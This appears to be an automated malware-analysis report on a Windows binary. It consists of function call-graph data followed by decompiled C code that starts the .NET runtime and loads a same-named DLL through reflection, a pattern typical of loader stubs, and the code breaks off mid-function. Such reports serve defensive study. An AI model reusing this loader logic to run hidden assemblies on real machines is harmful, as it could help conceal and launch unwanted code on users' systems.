__cftoe_l 9 API calls 8489->8490 8490->8486 8492 3f841c __isleadbyte_l 58 API calls 8491->8492 8493 3f8463 8492->8493 8493->8461 8495 3f21e4 __free_osfhnd 58 API calls 8494->8495 8496 3f2200 __dosmaperr 8495->8496 8497 3f2218 __cftoe_l 58 API calls 8496->8497 8498 3f2213 8497->8498 8498->8454 8500 3f839a 8499->8500 8504 3f83af 8499->8504 8501 3f21e4 __free_osfhnd 58 API calls 8500->8501 8503 3f839f 8501->8503 8502 3f21e4 __free_osfhnd 58 API calls 8505 3f83de 8502->8505 8506 3f2218 __cftoe_l 58 API calls 8503->8506 8504->8502 8507 3f83d4 8504->8507 8508 3f2218 __cftoe_l 58 API calls 8505->8508 8509 3f83a7 8506->8509 8507->8475 8510 3f83e6 8508->8510 8509->8475 8511 3f29e1 __cftoe_l 9 API calls 8510->8511 8511->8509 8512->8468 8514 3f838f __commit 58 API calls 8513->8514 8517 3f89c4 8514->8517 8515 3f8a1a 8531 3f8309 8515->8531 8517->8515 8520 3f838f __commit 58 API calls 8517->8520 8526 3f89f8 8517->8526 8518 3f838f __commit 58 API calls 8521 3f8a04 CloseHandle 8518->8521 8522 3f89ef 8520->8522 8521->8515 8523 3f8a10 GetLastError 8521->8523 8525 3f838f __commit 58 API calls 8522->8525 8523->8515 8524 3f21f7 __dosmaperr 58 API calls 8527 3f8a44 8524->8527 8525->8526 8526->8515 8526->8518 8527->8365 8540 3f83f6 LeaveCriticalSection 8528->8540 8530 3f8994 8530->8363 8532 3f8375 8531->8532 8533 3f8315 8531->8533 8534 3f2218 __cftoe_l 58 API calls 8532->8534 8533->8532 8538 3f833e 8533->8538 8535 3f837a 8534->8535 8536 3f21e4 __free_osfhnd 58 API calls 8535->8536 8537 3f8366 8536->8537 8537->8524 8537->8527 8538->8537 8539 3f8360 SetStdHandle 8538->8539 8539->8537 8540->8530 8542 3f5e1d 8541->8542 8543 3f5e3c LeaveCriticalSection 8541->8543 8542->8543 8544 3f5e24 8542->8544 8543->8323 8547 3f4b3b LeaveCriticalSection 8544->8547 8546 3f5e39 8546->8323 8547->8546 8548->8298 7764 3fc4b7 7767 3fc6a3 7764->7767 7766 3fc4bf 7768 3fc6ec 7767->7768 7769 3fc6b3 7767->7769 7768->7766 7769->7768 7770 3f2e9c ___InternalCxxFrameHandler 58 API calls 7769->7770 7771 3fc6df 7770->7771 
7771->7766 7712 3fd235 7713 3f1b07 __cftoe_l 6 API calls 7712->7713 7714 3fd249 7713->7714 7715 3f1b07 __cftoe_l 6 API calls 7714->7715 7716 3fd253 7715->7716 8549 3fcf75 8552 3fcea6 8549->8552 8553 3fcecb 8552->8553 8554 3fceb6 8552->8554 8555 3f2e9c ___InternalCxxFrameHandler 58 API calls 8553->8555 8554->8553 8557 3f2e9c ___InternalCxxFrameHandler 58 API calls 8554->8557 8559 3fceea 8554->8559 8556 3fcedc 8555->8556 8558 3f2e9c ___InternalCxxFrameHandler 58 API calls 8556->8558 8556->8559 8557->8553 8558->8559 8801 3fc3b5 8802 3f4ce8 IsInExceptionSpec 62 API calls 8801->8802 8803 3fc3bd __initptd 8801->8803 8802->8803 7772 3f16b0 7773 3f16b9 7772->7773 7774 3f16e7 SetEvent 7772->7774 7776 3f16be 7773->7776 7777 3f16d5 SetEvent 7773->7777 7775 3f16f2 7774->7775 7776->7775 7778 3f16c3 SetEvent 7776->7778 7843 3f26f0 7844 3f271a 7843->7844 7845 3f2727 7843->7845 7846 3f1b07 __cftoe_l 6 API calls 7844->7846 7847 3f1b07 __cftoe_l 6 API calls 7845->7847 7846->7845 7851 3f2737 __except_handler4 7847->7851 7848 3f284f 7849 3f2804 __except_handler4 7849->7848 7850 3f283f 7849->7850 7852 3f1b07 __cftoe_l 6 API calls 7849->7852 7853 3f1b07 __cftoe_l 6 API calls 7850->7853 7851->7848 7851->7849 7855 3f278e __IsNonwritableInCurrentImage 7851->7855 7852->7850 7853->7848 7861 3f5892 RtlUnwind 7855->7861 7856 3f2866 7858 3f1b07 __cftoe_l 6 API calls 7856->7858 7857 3f27cc __except_handler4 7857->7856 7859 3f1b07 __cftoe_l 6 API calls 7857->7859 7860 3f2876 __except_handler4 7858->7860 7859->7856 7862 3f58a6 7861->7862 7862->7857 8560 3fd170 8561 3f1b07 __cftoe_l 6 API calls 8560->8561 8562 3fd181 8561->8562 8804 3f3fb0 IsProcessorFeaturePresent 8805 3f3fd6 8804->8805 8809 3f6ff0 RtlUnwind 7779 3f48af 7782 3f4912 7779->7782 7781 3f48c0 Mailbox 7783 3f491b 7782->7783 7784 3f4923 7782->7784 7785 3f1b1f __getptd_noexit 58 API calls 7783->7785 7784->7781 7785->7784 8140 3f1f2f 8141 3f1f3e 8140->8141 8142 3f1f44 8140->8142 8143 3f2389 _abort 58 API calls 8141->8143 8144 3f1f49 
__initptd 8142->8144 8146 3f22e7 8142->8146 8143->8142 8147 3f243f _doexit 58 API calls 8146->8147 8148 3f22f2 8147->8148 8148->8144 7745 3f626a 7746 3f22cb __lock 58 API calls 7745->7746 7747 3f6271 7746->7747 8563 3f2d67 8565 3f2d73 __initptd 8563->8565 8564 3f2d8c 8566 3f2d9b 8564->8566 8569 3f1b1f __getptd_noexit 58 API calls 8564->8569 8565->8564 8567 3f2e7b __initptd 8565->8567 8568 3f1b1f __getptd_noexit 58 API calls 8565->8568 8570 3f2daa 8566->8570 8571 3f1b1f __getptd_noexit 58 API calls 8566->8571 8568->8564 8569->8566 8572 3f2db9 8570->8572 8573 3f1b1f __getptd_noexit 58 API calls 8570->8573 8571->8570 8574 3f2dc8 8572->8574 8576 3f1b1f __getptd_noexit 58 API calls 8572->8576 8573->8572 8575 3f2dd7 8574->8575 8577 3f1b1f __getptd_noexit 58 API calls 8574->8577 8578 3f2de6 8575->8578 8579 3f1b1f __getptd_noexit 58 API calls 8575->8579 8576->8574 8577->8575 8580 3f2df8 8578->8580 8581 3f1b1f __getptd_noexit 58 API calls 8578->8581 8579->8578 8582 3f49d1 __lock 58 API calls 8580->8582 8581->8580 8585 3f2e00 8582->8585 8583 3f2e23 8595 3f2e87 8583->8595 8585->8583 8587 3f1b1f __getptd_noexit 58 API calls 8585->8587 8587->8583 8588 3f49d1 __lock 58 API calls 8592 3f2e37 ___removelocaleref 8588->8592 8591 3f1b1f __getptd_noexit 58 API calls 8591->8567 8593 3f5a40 ___freetlocinfo 58 API calls 8592->8593 8594 3f2e68 8592->8594 8593->8594 8598 3f2e93 8594->8598 8601 3f4b3b LeaveCriticalSection 8595->8601 8597 3f2e30 8597->8588 8602 3f4b3b LeaveCriticalSection 8598->8602 8600 3f2e75 8600->8591 8601->8597 8602->8600 7748 3f8864 7749 3f886c __cfltcvt_init 7748->7749 7750 3f8877 7749->7750 7752 3fa7ea 7749->7752 7758 3fb01f 7752->7758 7754 3fa7fd 7755 3fa804 7754->7755 7756 3f29f1 __invoke_watson 8 API calls 7754->7756 7755->7750 7757 3fa810 7756->7757 7759 3fb03b __control87 7758->7759 7762 3fb05b __control87 7758->7762 7760 3f2218 __cftoe_l 58 API calls 7759->7760 7761 3fb051 7760->7761 7763 3f29e1 __cftoe_l 9 API calls 7761->7763 7762->7754 7763->7762 8149 3fa723 
8152 3fa734 8149->8152 8153 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8152->8153 8154 3fa746 8153->8154 8161 3fabb1 8154->8161 8156 3fa752 8157 3fa766 8156->8157 8166 3faa43 8156->8166 8159 3fabb1 __forcdecpt_l 65 API calls 8157->8159 8160 3fa730 8159->8160 8162 3fabcf 8161->8162 8163 3fabbd 8161->8163 8171 3faa6e 8162->8171 8163->8156 8167 3faa4f 8166->8167 8168 3faa60 8166->8168 8167->8156 8193 3fa9f1 8168->8193 8172 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8171->8172 8173 3faa81 8172->8173 8174 3faaed 8173->8174 8175 3faa8d 8173->8175 8176 3fab0b 8174->8176 8190 3f841c 8174->8190 8182 3faaa2 8175->8182 8183 3f862a 8175->8183 8178 3f2218 __cftoe_l 58 API calls 8176->8178 8180 3fab11 8176->8180 8178->8180 8181 3f6c58 ___crtLCMapStringA 62 API calls 8180->8181 8181->8182 8182->8156 8184 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8183->8184 8185 3f863c 8184->8185 8186 3f841c __isleadbyte_l 58 API calls 8185->8186 8189 3f8649 8185->8189 8187 3f866d 8186->8187 8188 3f6d96 ___crtGetStringTypeA 61 API calls 8187->8188 8188->8189 8189->8182 8191 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8190->8191 8192 3f842d 8191->8192 8192->8176 8194 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8193->8194 8195 3faa02 8194->8195 8196 3f862a __isctype_l 61 API calls 8195->8196 8197 3faa19 8195->8197 8196->8197 8197->8156 8810 3f1ddf 8813 3f1db3 8810->8813 8812 3f1dea Mailbox 8816 3f2b4c 8813->8816 8815 3f1dbf 8815->8812 8817 3f2b58 __initptd 8816->8817 8818 3f49d1 __lock 58 API calls 8817->8818 8822 3f2b5f 8818->8822 8820 3f2b90 8823 3f1b1f __getptd_noexit 58 API calls 8820->8823 8821 3f2baa __initptd 8821->8815 8822->8820 8824 3f1b1f __getptd_noexit 58 API calls 8822->8824 8825 3f2b99 8822->8825 8823->8825 8824->8820 8826 3f2bb4 8825->8826 8829 3f4b3b LeaveCriticalSection 8826->8829 8828 3f2bbb 8828->8821 8829->8828 7863 3fccdb 7864 3f4ce8 IsInExceptionSpec 62 API calls 7863->7864 7865 3fcce3 7864->7865 8198 3f1f1b 8201 3f2c0c 8198->8201 8202 3f2eb4 
__getptd_noexit 58 API calls 8201->8202 8203 3f1f2c 8202->8203 8204 3f8119 8205 3f8125 __initptd 8204->8205 8206 3f815c __initptd 8205->8206 8207 3f49d1 __lock 58 API calls 8205->8207 8208 3f8139 8207->8208 8209 3f5cba __updatetlocinfoEx_nolock 58 API calls 8208->8209 8210 3f8149 8209->8210 8212 3f8162 8210->8212 8215 3f4b3b LeaveCriticalSection 8212->8215 8214 3f8169 8214->8206 8215->8214 7866 3f4cd8 7867 3f4cdb 7866->7867 7868 3f4ce8 IsInExceptionSpec 62 API calls 7867->7868 7869 3f4ce7 __initptd 7868->7869 7870 3f2e9c ___InternalCxxFrameHandler 58 API calls 7869->7870 7871 3f4cf9 7870->7871 7872 3f6273 _abort 62 API calls 7871->7872 7873 3f4d1b 7872->7873 7874 3f2e9c ___InternalCxxFrameHandler 58 API calls 7873->7874 7875 3f4d21 7874->7875 8603 3f1b57 8604 3f25b3 __calloc_crt 58 API calls 8603->8604 8605 3f1b61 EncodePointer 8604->8605 8606 3f1b7a 8605->8606 7789 3fce96 7791 3fce9e __initptd 7789->7791 7792 3f4ce8 7789->7792 7793 3f4cf4 __initptd 7792->7793 7794 3f2e9c ___InternalCxxFrameHandler 58 API calls 7793->7794 7795 3f4cf9 7794->7795 7800 3f6273 7795->7800 7811 3f4d4d DecodePointer 7800->7811 7802 3f6278 7803 3f6283 7802->7803 7812 3f4d76 7802->7812 7805 3f62ab 7803->7805 7806 3f628d IsProcessorFeaturePresent 7803->7806 7807 3f2389 _abort 58 API calls 7805->7807 7808 3f6298 7806->7808 7809 3f62b5 7807->7809 7810 3f2884 __call_reportfault 7 API calls 7808->7810 7810->7805 7811->7802 7815 3f4d82 __initptd 7812->7815 7813 3f4dec 7814 3f4dc9 DecodePointer 7813->7814 7819 3f4dfb 7813->7819 7820 3f4db8 _siglookup 7814->7820 7815->7813 7815->7814 7816 3f4db3 7815->7816 7822 3f4daf 7815->7822 7817 3f2eb4 __getptd_noexit 58 API calls 7816->7817 7817->7820 7821 3f2218 __cftoe_l 58 API calls 7819->7821 7824 3f4e59 7820->7824 7826 3f2389 _abort 58 API calls 7820->7826 7832 3f4dc1 __initptd 7820->7832 7823 3f4e00 7821->7823 7822->7816 7822->7819 7825 3f29e1 __cftoe_l 9 API calls 7823->7825 7827 3f49d1 __lock 58 API calls 7824->7827 7829 3f4e64 7824->7829 7825->7832 
7826->7824 7827->7829 7828 3f4ec6 EncodePointer 7830 3f4e99 7828->7830 7829->7828 7829->7830 7833 3f4ef7 7830->7833 7832->7803 7834 3f4efb 7833->7834 7835 3f4f02 7833->7835 7837 3f4b3b LeaveCriticalSection 7834->7837 7835->7832 7837->7835 8216 3fbf14 8217 3f1b07 __cftoe_l 6 API calls 8216->8217 8218 3fbf26 8217->8218 8219 3fcfcd ___InternalCxxFrameHandler 66 API calls 8218->8219 8220 3fbf3f 8219->8220 7838 3f1090 VariantClear 7876 3f1acf DeleteCriticalSection 7877 3f1ae5 7876->7877 7878 3f1af4 7877->7878 7879 3f1b1f __getptd_noexit 58 API calls 7877->7879 7879->7878 8221 3f4d0c 8222 3f4d0f 8221->8222 8223 3f6273 _abort 62 API calls 8222->8223 8224 3f4d1b 8223->8224 8225 3f2e9c ___InternalCxxFrameHandler 58 API calls 8224->8225 8226 3f4d21 8225->8226 8607 3f9d4c 8610 3f9d6d 8607->8610 8609 3f9d68 8611 3f9d78 8610->8611 8612 3f9dd7 8610->8612 8611->8612 8614 3f9d7d 8611->8614 8678 3fa2be 8612->8678 8615 3f9d9b 8614->8615 8616 3f9d82 8614->8616 8617 3f9dbe 8615->8617 8619 3f9da5 8615->8619 8624 3fa478 8616->8624 8665 3f9df3 8617->8665 8643 3fa539 8619->8643 8623 3f9dbc 8623->8609 8695 3fae8f 8624->8695 8627 3fa4bd 8630 3fa4d5 8627->8630 8631 3fa4c5 8627->8631 8628 3fa4ad 8629 3f2218 __cftoe_l 58 API calls 8628->8629 8632 3fa4b2 8629->8632 8707 3fad17 8630->8707 8633 3f2218 __cftoe_l 58 API calls 8631->8633 8635 3f29e1 __cftoe_l 9 API calls 8632->8635 8636 3fa4ca 8633->8636 8639 3fa4b9 8635->8639 8637 3f29e1 __cftoe_l 9 API calls 8636->8637 8637->8639 8638 3fa508 8638->8639 8716 3fa38c 8638->8716 8641 3f1b07 __cftoe_l 6 API calls 8639->8641 8642 3f9d96 8641->8642 8642->8609 8644 3fae8f __fltout2 58 API calls 8643->8644 8645 3fa567 8644->8645 8646 3fa56e 8645->8646 8647 3fa581 8645->8647 8650 3f2218 __cftoe_l 58 API calls 8646->8650 8648 3fa59c 8647->8648 8649 3fa589 8647->8649 8654 3fad17 __fptostr 58 API calls 8648->8654 8651 3f2218 __cftoe_l 58 API calls 8649->8651 8652 3fa573 8650->8652 8653 3fa58e 8651->8653 8655 3f29e1 __cftoe_l 9 API calls 8652->8655 8656 3f29e1 
__cftoe_l 9 API calls 8653->8656 8657 3fa5c8 8654->8657 8658 3fa57a 8655->8658 8656->8658 8657->8658 8660 3fa60e 8657->8660 8663 3fa5e8 8657->8663 8659 3f1b07 __cftoe_l 6 API calls 8658->8659 8662 3fa634 8659->8662 8736 3fa16d 8660->8736 8662->8623 8664 3fa38c __cftof2_l 58 API calls 8663->8664 8664->8658 8666 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8665->8666 8667 3f9e18 8666->8667 8668 3f9e2f 8667->8668 8669 3f9e38 8667->8669 8670 3f2218 __cftoe_l 58 API calls 8668->8670 8672 3f9e41 8669->8672 8675 3f9e55 8669->8675 8671 3f9e34 8670->8671 8674 3f29e1 __cftoe_l 9 API calls 8671->8674 8673 3f2218 __cftoe_l 58 API calls 8672->8673 8673->8671 8677 3f9e50 _memset __alldvrm __cftoa_l _strrchr 8674->8677 8675->8677 8768 3fa14f 8675->8768 8677->8623 8679 3fae8f __fltout2 58 API calls 8678->8679 8680 3fa2f0 8679->8680 8681 3fa307 8680->8681 8682 3fa2f7 8680->8682 8683 3fa30e 8681->8683 8684 3fa318 8681->8684 8685 3f2218 __cftoe_l 58 API calls 8682->8685 8686 3f2218 __cftoe_l 58 API calls 8683->8686 8689 3fad17 __fptostr 58 API calls 8684->8689 8687 3fa2fc 8685->8687 8686->8687 8688 3f29e1 __cftoe_l 9 API calls 8687->8688 8690 3fa303 8688->8690 8691 3fa358 8689->8691 8692 3f1b07 __cftoe_l 6 API calls 8690->8692 8691->8690 8693 3fa16d __cftoe2_l 58 API calls 8691->8693 8694 3fa388 8692->8694 8693->8690 8694->8623 8696 3faeb8 ___dtold 8695->8696 8723 3fb07c 8696->8723 8699 3f58c2 __setenvp 58 API calls 8700 3faef3 8699->8700 8701 3faefa 8700->8701 8702 3faf10 8700->8702 8703 3f1b07 __cftoe_l 6 API calls 8701->8703 8704 3f29f1 __invoke_watson 8 API calls 8702->8704 8706 3fa4a6 8703->8706 8705 3faf1c 8704->8705 8706->8627 8706->8628 8708 3fad3f 8707->8708 8709 3fad29 8707->8709 8708->8709 8711 3fad45 8708->8711 8710 3f2218 __cftoe_l 58 API calls 8709->8710 8712 3fad2e 8710->8712 8714 3f2218 __cftoe_l 58 API calls 8711->8714 8715 3fad38 _memmove _strlen 8711->8715 8713 3f29e1 __cftoe_l 9 API calls 8712->8713 8713->8715 8714->8712 8715->8638 8717 3f4f96 
_LocaleUpdate::_LocaleUpdate 58 API calls 8716->8717 8718 3fa3a9 8717->8718 8719 3f2218 __cftoe_l 58 API calls 8718->8719 8722 3fa3c5 _memset __shift 8718->8722 8720 3fa3bb 8719->8720 8721 3f29e1 __cftoe_l 9 API calls 8720->8721 8721->8722 8722->8639 8726 3fb0d1 8723->8726 8724 3fb143 8727 3f58c2 __setenvp 58 API calls 8724->8727 8725 3f1b07 __cftoe_l 6 API calls 8728 3faed3 8725->8728 8726->8724 8729 3fb15c 8726->8729 8730 3fb0e3 8726->8730 8727->8730 8728->8699 8732 3f58c2 __setenvp 58 API calls 8729->8732 8731 3fba18 8730->8731 8735 3fb0f4 8730->8735 8733 3f29f1 __invoke_watson 8 API calls 8731->8733 8732->8730 8734 3fba4f 8733->8734 8735->8725 8737 3f4f96 _LocaleUpdate::_LocaleUpdate 58 API calls 8736->8737 8738 3fa180 8737->8738 8739 3fa18d 8738->8739 8740 3fa196 8738->8740 8741 3f2218 __cftoe_l 58 API calls 8739->8741 8743 3fa1ab 8740->8743 8746 3fa1bf __shift 8740->8746 8742 3fa192 8741->8742 8745 3f29e1 __cftoe_l 9 API calls 8742->8745 8744 3f2218 __cftoe_l 58 API calls 8743->8744 8744->8742 8751 3fa1ba _memmove 8745->8751 8747 3f58c2 __setenvp 58 API calls 8746->8747 8748 3fa236 8747->8748 8749 3f29f1 __invoke_watson 8 API calls 8748->8749 8748->8751 8750 3fa2bd 8749->8750 8752 3fae8f __fltout2 58 API calls 8750->8752 8751->8658 8753 3fa2f0 8752->8753 8754 3fa307 8753->8754 8755 3fa2f7 8753->8755 8756 3fa30e 8754->8756 8757 3fa318 8754->8757 8758 3f2218 __cftoe_l 58 API calls 8755->8758 8759 3f2218 __cftoe_l 58 API calls 8756->8759 8762 3fad17 __fptostr 58 API calls 8757->8762 8760 3fa2fc 8758->8760 8759->8760 8761 3f29e1 __cftoe_l 9 API calls 8760->8761 8763 3fa303 8761->8763 8764 3fa358 8762->8764 8765 3f1b07 __cftoe_l 6 API calls 8763->8765 8764->8763 8766 3fa16d __cftoe2_l 58 API calls 8764->8766 8767 3fa388 8765->8767 8766->8763 8767->8658 8769 3fa2be __cftoe_l 58 API calls 8768->8769 8770 3fa168 8769->8770 8770->8677 7880 3fc2ca 7883 3fcfcd 7880->7883 7884 3f2e9c ___InternalCxxFrameHandler 58 API calls 7883->7884 7885 3fcfd8 7884->7885 7886 3fd019 
7885->7886 7887 3fd03a 7885->7887 7890 3fc2f0 7885->7890 7886->7890 7891 3fcef4 7886->7891 7887->7890 7901 3fc6f0 7887->7901 7892 3fcf00 __initptd 7891->7892 7893 3f2e9c ___InternalCxxFrameHandler 58 API calls 7892->7893 7898 3fcf20 __CallSettingFrame@12 7893->7898 7894 3fcf8e 7971 3fcfb3 7894->7971 7898->7894 7959 3f4cb0 7898->7959 7899 3fcfa4 __initptd 7899->7890 7900 3f4cb0 IsInExceptionSpec 63 API calls 7900->7899 7902 3fc710 7901->7902 7903 3f4cb0 IsInExceptionSpec 63 API calls 7902->7903 7905 3fc72b 7902->7905 7903->7905 7904 3fc9f4 7906 3fca18 7904->7906 7908 3fca01 7904->7908 7958 3fc815 type_info::operator== 7904->7958 7905->7904 7910 3f2e9c ___InternalCxxFrameHandler 58 API calls 7905->7910 7912 3fc80f 7905->7912 7907 3f2e9c ___InternalCxxFrameHandler 58 API calls 7906->7907 7909 3fca20 7907->7909 8000 3fca8d 7908->8000 7914 3fca2d 7909->7914 7918 3f4cb0 IsInExceptionSpec 63 API calls 7909->7918 7915 3fc771 7910->7915 7911 3f4ce8 IsInExceptionSpec 62 API calls 7916 3fca39 ___DestructExceptionObject 7911->7916 7912->7904 7917 3fc891 7912->7917 7912->7958 7914->7890 7915->7914 7920 3f2e9c ___InternalCxxFrameHandler 58 API calls 7915->7920 8015 3f480e 7916->8015 7924 3fc98a ___DestructExceptionObject 7917->7924 7984 3fc122 7917->7984 7918->7914 7921 3fc782 7920->7921 7923 3f2e9c ___InternalCxxFrameHandler 58 API calls 7921->7923 7932 3fc78d FindHandler 7923->7932 7924->7906 7927 3fcba9 IsInExceptionSpec 63 API calls 7924->7927 7926 3f496e __CxxThrowException@8 RaiseException 7928 3fc9df 7926->7928 7929 3fc9bf 7927->7929 8018 3fc1d2 RtlUnwind 7928->8018 7929->7906 7930 3fc9c5 7929->7930 7934 3f2e9c ___InternalCxxFrameHandler 58 API calls 7930->7934 7936 3f4cb0 IsInExceptionSpec 63 API calls 7932->7936 7940 3fc7ad 7932->7940 7933 3fc7e0 7939 3f2e9c ___InternalCxxFrameHandler 58 API calls 7933->7939 7937 3fc9ca 7934->7937 7935 3fca73 7938 3fcef4 ___FrameUnwindToState 63 API calls 7935->7938 7936->7940 7941 3f2e9c ___InternalCxxFrameHandler 58 API calls 
Control-flow graph edge data, continued from the previous section (node ids, code addresses and per-node API call counts of the function-call graph). Most nodes are CRT exception-handling and locale helpers (___InternalCxxFrameHandler, IsInExceptionSpec, RtlUnwind, RaiseException, __CxxThrowException@8, ___DestructExceptionObject, _LocaleUpdate::_LocaleUpdate, __cftoe_l, __calloc_crt, __cinit). Windows APIs named in this fragment: InitializeCriticalSectionAndSpinCount, GetLastError, IsDebuggerPresent, OutputDebugStringW, GetCurrentProcessId, RegisterServiceCtrlHandlerExW, SetServiceStatus, CreateEventW, VariantInit, VariantClear, CloseHandle, EncodePointer, DecodePointer.

                                                                          Executed Functions

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph for E003F1160 (basic blocks 3f1160 to 3f16a4), stored in the report as edge data. APIs called along the graph: LoadLibraryW, GetProcAddress, CorBindToRuntimeEx, SysAllocString, SysFreeString, GetModuleHandleW, GetModuleFileNameW, PathRemoveExtensionW, PathFindFileNameW, StrCpyW, SafeArrayCreateVector, SafeArrayPutElement, VariantClear, VariantInit; internal calls to 3f1020, 3f1b16, 3f10a0 and 3f1b07.
                                                                          C-Code - Quality: 43%
                                                                          			E003F1160(void* __ebx, short __ecx, intOrPtr _a4) {
                                                                          				WCHAR* _v8;
                                                                          				char _v16;
                                                                          				signed int _v24;
                                                                          				short _v544;
                                                                          				short _v1064;
                                                                          				WCHAR* _v1068;
                                                                          				WCHAR* _v1072;
                                                                          				WCHAR* _v1076;
                                                                          				WCHAR* _v1080;
                                                                          				WCHAR* _v1084;
                                                                          				WCHAR* _v1088;
                                                                          				WCHAR* _v1092;
                                                                          				WCHAR* _v1096;
                                                                          				WCHAR* _v1100;
                                                                          				intOrPtr _v1112;
                                                                          				char _v1120;
                                                                          				intOrPtr* _v1124;
                                                                          				intOrPtr _v1128;
                                                                          				short _v1132;
                                                                          				intOrPtr* _v1144;
                                                                          				char _v1152;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t132;
                                                                          				signed int _t133;
                                                                          				_Unknown_base(*)()* _t137;
                                                                          				intOrPtr* _t139;
                                                                          				intOrPtr* _t141;
                                                                          				intOrPtr* _t143;
                                                                          				intOrPtr* _t145;
                                                                          				intOrPtr* _t147;
                                                                          				WCHAR* _t148;
                                                                          				intOrPtr _t158;
                                                                          				WCHAR* _t161;
                                                                          				WCHAR* _t167;
                                                                          				intOrPtr* _t175;
                                                                          				WCHAR* _t178;
                                                                          				WCHAR* _t183;
                                                                          				WCHAR* _t184;
                                                                          				WCHAR* _t185;
                                                                          				WCHAR* _t186;
                                                                          				WCHAR* _t187;
                                                                          				WCHAR* _t188;
                                                                          				WCHAR* _t197;
                                                                          				WCHAR* _t200;
                                                                          				intOrPtr* _t211;
                                                                          				intOrPtr* _t214;
                                                                          				void* _t217;
                                                                          				intOrPtr* _t226;
                                                                          				WCHAR* _t242;
                                                                          				void* _t252;
                                                                          				intOrPtr* _t257;
                                                                          				intOrPtr* _t258;
                                                                          				void* _t259;
                                                                          				WCHAR* _t260;
                                                                          				WCHAR* _t262;
                                                                          				WCHAR** _t264;
                                                                          				intOrPtr* _t265;
                                                                          				intOrPtr* _t266;
                                                                          				void* _t268;
                                                                          				intOrPtr* _t269;
                                                                          				signed int _t270;
                                                                          
                                                                          				_t217 = __ebx;
                                                                          				_push(0xffffffff);
                                                                          				_push(E003FD235);
                                                                          				_push( *[fs:0x0]);
                                                                          				_t132 =  *0x404000; // 0xa8642a1f
                                                                          				_t133 = _t132 ^ _t270;
                                                                          				_v24 = _t133;
                                                                          				_push(_t133);
                                                                          				 *[fs:0x0] =  &_v16;
                                                                          				_v1132 = __ecx;
                                                                          				_v1128 = _a4;
                                                                          				_t137 = GetProcAddress(LoadLibraryW(L"mscoree.dll"), "CLRCreateInstance");
                                                                          				_v1076 = 0;
                                                                          				_v8 = 0;
                                                                          				if(_t137 == 0) {
                                                                          					L10:
                                                                          					__imp__CorBindToRuntimeEx(0, 0, 0, 0x402734, 0x402714,  &_v1076);
                                                                          					_t139 = _v1076;
                                                                          				} else {
                                                                          					_v1068 = 0;
                                                                          					_v8 = 1;
                                                                          					 *_t137(0x402724, 0x402764,  &_v1068); // executed
                                                                          					_t211 = _v1068;
                                                                          					if(_t211 != 0) {
                                                                          						_v1072 = 0;
                                                                          						_v8 = 2;
                                                                          						 *((intOrPtr*)( *_t211 + 0xc))(_t211, L"v4.0.30319", 0x402744,  &_v1072);
                                                                          						_t214 = _v1072;
                                                                          						if(_t214 != 0) {
                                                                          							 *((intOrPtr*)( *_t214 + 0x24))(_t214, 0x402734, 0x402714,  &_v1076);
                                                                          							_t214 = _v1072;
                                                                          						}
                                                                          						_v8 = 1;
                                                                          						if(_t214 != 0) {
                                                                          							 *((intOrPtr*)( *_t214 + 8))(_t214);
                                                                          						}
                                                                          						_t211 = _v1068;
                                                                          					}
                                                                          					_v8 = 0;
                                                                          					if(_t211 != 0) {
                                                                          						 *((intOrPtr*)( *_t211 + 8))(_t211);
                                                                          					}
                                                                          					_t139 = _v1076;
                                                                          					if(_t139 == 0) {
                                                                          						goto L10;
                                                                          					}
                                                                          				}
                                                                          				_v1080 = 0;
                                                                          				_v8 = 3;
                                                                          				 *((intOrPtr*)( *_t139 + 0x28))(_t139);
                                                                          				_t141 = _v1076;
                                                                          				 *((intOrPtr*)( *_t141 + 0x34))(_t141,  &_v1080);
                                                                          				_v1092 = 0;
                                                                          				_v8 = 4;
                                                                          				_t143 = _v1080;
                                                                          				 *((intOrPtr*)( *_t143))(_t143, 0x402754,  &_v1092);
                                                                          				_v1088 = 0;
                                                                          				_v8 = 5;
                                                                          				_t145 = _v1092;
                                                                          				 *((intOrPtr*)( *_t145 + 0x28))(_t145,  &_v1088);
                                                                          				_v1100 = 0;
                                                                          				_v8 = 6;
                                                                          				_t147 = _v1088;
                                                                          				_t223 =  *_t147; // executed
                                                                          				_t148 =  *((intOrPtr*)( *_t147 + 0x50))(_t147,  &_v1100);
                                                                          				_v1096 = 0;
                                                                          				_v8 = 7;
                                                                          				_t257 = _v1100;
                                                                          				__imp__#2(L"System.Reflection.Assembly");
                                                                          				_t262 = _t148;
                                                                          				_v1072 = _t262;
                                                                          				if(_t262 == 0) {
                                                                          					E003F1020(_t223, 0x8007000e);
                                                                          				}
                                                                          				_v8 = 8;
                                                                          				 *((intOrPtr*)( *_t257 + 0x44))(_t257, _t262,  &_v1096);
                                                                          				_v8 = 7;
                                                                          				__imp__#6(_t262);
                                                                          				GetModuleFileNameW(GetModuleHandleW(0),  &_v544, 0x104);
                                                                          				PathRemoveExtensionW( &_v544);
                                                                          				StrCpyW( &_v1064, PathFindFileNameW( &_v544));
                                                                          				_t226 =  &_v544;
                                                                          				_t252 = _t226 + 2;
                                                                          				do {
                                                                          					_t158 =  *_t226;
                                                                          					_t226 = _t226 + 2;
                                                                          					_t283 = _t158;
                                                                          				} while (_t158 != 0);
                                                                          				_t228 = _t226 - _t252 >> 1;
                                                                          				_t161 = StrCpyW( &(( &_v544)[_t226 - _t252 >> 1]), L".dll");
                                                                          				__imp__#411(0xc, 0, 1);
                                                                          				_v1072 = _t161;
                                                                          				_t264 = E003F1B16(_t217, _t252, _t257, _t283, 4);
                                                                          				if(_t264 == 0) {
                                                                          					_t264 = 0;
                                                                          					__eflags = 0;
                                                                          				} else {
                                                                          					 *_t264 = 0;
                                                                          				}
                                                                          				_t258 = __imp__#9;
                                                                          				_v1120 = 0;
                                                                          				_push( &_v1120);
                                                                          				if( *_t258() < 0) {
                                                                          					E003F1020(_t228, _t165);
                                                                          				}
                                                                          				_v1120 = 8;
                                                                          				_t167 =  &_v544;
                                                                          				__imp__#2(_t167);
                                                                          				_v1112 = _t167;
                                                                          				if(_t167 == 0) {
                                                                          					_v1112 = 0x8007000e;
                                                                          					_v1120 = 0xa;
